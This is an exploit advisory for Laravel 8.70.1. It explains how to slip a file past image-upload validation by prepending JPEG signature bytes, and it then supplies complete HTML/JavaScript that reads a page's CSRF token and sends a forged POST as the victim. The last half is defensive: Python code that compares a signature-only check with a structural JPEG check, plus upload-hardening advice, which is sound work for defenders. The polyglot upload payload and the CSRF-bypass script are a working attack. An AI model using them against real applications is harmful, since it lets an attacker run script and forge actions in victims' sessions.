# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux
# Description: We can bypass Laravel's image file upload validation to upload arbitrary files to the web server,
# which lets us run arbitrary JavaScript and bypass the CSRF token. For more information read
# https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
# Steps to reproduce:
1- Use the HxD tool and add FF D8 FF E0 at the very beginning of your file
2- Use the code below to bypass the CSRF token
ÿØÿà<html>
<head><title>Laravel Csrf Bypass</title></head>
<body>
<script>
// Target of the forged POST; edit it and the GET path below to match the application
var POST_URL = "/";

function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);
    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // This is for debugging and can be removed
    xhr.onreadystatechange = function () {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    };
    xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tells it to return the response as an HTML document
    xhr.responseType = "document";
    // Edit the path as you want; true on the end makes the call asynchronous
    xhr.open("GET", "/image-upload", true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            var page = xhr.response;
            // Get the input element holding the token
            var input = page.getElementsByTagName("input")[0];
            // Show the token
            alert("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}

getTokenJS();
</script>
</body>
</html>

3- Save it as an HTML file and upload it.
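The bypass works because the upload validator only consults the leading bytes of the file: once FF D8 FF E0 is prepended, any content behind it is accepted as a JPEG. The check below is an added defender-side example, not part of this exploit or of Laravel, and the function names and sample inputs are hypothetical. It contrasts the weak signature-only test with a walk over the JPEG marker segments that a real image must contain (SOI, length-prefixed segments, SOS/EOI); the HTML polyglot fails because the bytes after the APP0 marker are read as a segment length that exceeds the file.

```python
"""Structural JPEG check vs. a leading-bytes-only check (added example, hypothetical names)."""
from typing import Optional

# Constructed inputs: a minimal JPEG skeleton (SOI, JFIF APP0 segment, EOI) and the
# polyglot shape from the advisory: the same four signature bytes followed by HTML.
VALID_JPEG = (
    b"\xff\xd8"                                   # SOI
    + b"\xff\xe0" + (16).to_bytes(2, "big")       # APP0, length 16 (includes the length field)
    + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xd9"                                 # EOI
)
HTML_POLYGLOT = b"\xff\xd8\xff\xe0" + b"<html><body>uploaded page</body></html>"


def magic_only_check(data: bytes) -> bool:
    """The weak check: accept anything whose first bytes match the JPEG/JFIF signature."""
    return data[:4] == b"\xff\xd8\xff\xe0"


def jpeg_structure_error(data: bytes) -> Optional[str]:
    """Walk the marker segments a real JPEG must have; return a reason on the first
    inconsistency, or None if the structure is plausible."""
    if data[:2] != b"\xff\xd8":
        return "missing SOI marker"
    pos = 2
    while True:
        if pos + 2 > len(data):
            return "truncated before a marker"
        if data[pos] != 0xFF:
            return f"expected marker byte at offset {pos}"
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte: markers may be preceded by extra 0xFF
            pos += 1
            continue
        pos += 2
        if marker == 0xD9:            # EOI: clean end of image
            return None
        if marker == 0xDA:            # SOS: entropy-coded data follows until EOI
            return None if data.endswith(b"\xff\xd9") else "scan data without EOI marker"
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # TEM / RSTn carry no length field
            continue
        if pos + 2 > len(data):
            return f"truncated length field for marker 0x{marker:02X}"
        seg_len = int.from_bytes(data[pos:pos + 2], "big")
        if seg_len < 2 or pos + seg_len > len(data):
            return f"segment 0x{marker:02X} claims {seg_len} bytes at offset {pos}, exceeds file"
        pos += seg_len


def is_plausible_jpeg(data: bytes) -> bool:
    """Accept only files whose segment structure is consistent end to end."""
    return jpeg_structure_error(data) is None


if __name__ == "__main__":
    for name, blob in (("VALID_JPEG", VALID_JPEG), ("HTML_POLYGLOT", HTML_POLYGLOT)):
        print(f"{name}: magic-only={magic_only_check(blob)} "
              f"structural={jpeg_structure_error(blob) or 'ok'}")
```

A structural walk raises the bar but does not rule out every polyglot, so it belongs alongside the usual upload controls rather than replacing them: re-encode accepted images with an image library so that only pixel data survives, store uploads under a server-chosen name and extension, and serve them from a separate origin or with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff` so a file that is not really an image is never rendered as HTML in the application's origin.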